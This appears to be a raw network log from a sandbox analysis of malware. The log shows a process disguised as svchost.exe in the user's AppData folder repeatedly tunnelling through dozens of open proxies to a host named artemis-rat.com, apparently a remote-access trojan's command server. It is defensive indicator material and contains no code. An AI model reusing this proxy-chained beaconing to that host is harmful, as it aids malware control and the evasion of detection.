Mar 9, 2024 13:14:36.995798111 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.154820919 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3539	192.168.2.5	61040	103.49.114.195	8080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.996618032 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3540	192.168.2.5	61272	185.162.230.201	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.000492096 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.155314922 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3541	192.168.2.5	61137	46.17.63.166	9480	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.002744913 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3542	192.168.2.5	61135	52.16.232.164	3128	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.007225990 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.313221931 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:37 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3543	192.168.2.5	61278	104.22.1.113	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.007685900 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.162292957 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3544	192.168.2.5	61284	104.18.220.95	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.012042046 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.166449070 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3545	192.168.2.5	61123	128.199.221.91	7176	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.041429996 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.846124887 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3546	192.168.2.5	61120	103.118.46.177	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.048425913 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3547	192.168.2.5	57699	186.96.50.20	999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.056031942 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.646007061 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.333864927 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3548	192.168.2.5	61100	103.163.51.254	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.058181047 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.458854914 CET	343	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3549	192.168.2.5	61147	94.247.241.70	53640	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.075582027 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.846306086 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3550	192.168.2.5	61228	52.196.1.182	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.075639963 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.343141079 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:37 GMT Server: nginx Content-Type: text/plain Content-Length: 0
Mar 9, 2024 13:14:37.492099047 CET	177	OUT	Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 ac 90 31 e7 be e8 a5 a0 c8 34 9b 85 ec 08 76 b9 d6 33 13 67 b6 50 ce 4f fd 30 32 06 58 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: eR14v3gPO02X*,+0/$#('=<5/Uartemis-rat.com#
Mar 9, 2024 13:14:37.760390043 CET	1079	IN	Data Raw: 16 03 03 00 3d 02 00 00 39 03 03 63 ae b1 38 8b 41 36 5a c7 58 89 6f 08 98 11 27 7f ce 2b 7e f9 3d 3f b5 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 Data Ascii: =9c8A6ZXo'+~=?DOWNGRD0000H010Uartemis-rat.com0240309120120Z260309120120Z010Uartemis-rat.com0"0H0LU,m-YLa

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3551	192.168.2.5	61116	13.234.24.116	3128	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.081268072 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.482995987 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:37 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3552	192.168.2.5	61072	102.132.201.202	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.081723928 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.127774954 CET	343	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3553	192.168.2.5	61165	134.209.105.209	3128	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.087435961 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3554	192.168.2.5	61159	201.13.147.161	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.091676950 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3555	192.168.2.5	61230	5.135.83.214	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.119308949 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.447462082 CET	327	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3556	192.168.2.5	61186	167.86.69.142	42214	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.123380899 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.974073887 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3557	192.168.2.5	61196	222.223.103.232	7302	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.124068975 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.478981018 CET	90	IN	HTTP/1.1 200 OK Content-Type: application/json Connection: close Content-Length: 55

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3558	192.168.2.5	61320	142.4.123.41	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.124413013 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3559	192.168.2.5	57735	139.162.238.184	29870	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.125737906 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3560	192.168.2.5	61164	65.1.40.47	1080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.136534929 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.521250010 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:37 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3561	192.168.2.5	60996	111.53.178.249	7302	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.145271063 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3562	192.168.2.5	61353	104.25.115.125	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.161883116 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.316960096 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3563	192.168.2.5	61290	134.209.189.42	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.164674044 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.457410097 CET	327	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3564	192.168.2.5	61273	45.120.178.197	1080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.167849064 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3565	192.168.2.5	61270	181.212.136.34	5199	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.170228958 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.973823071 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3566	192.168.2.5	57563	176.58.103.55	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.170377970 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
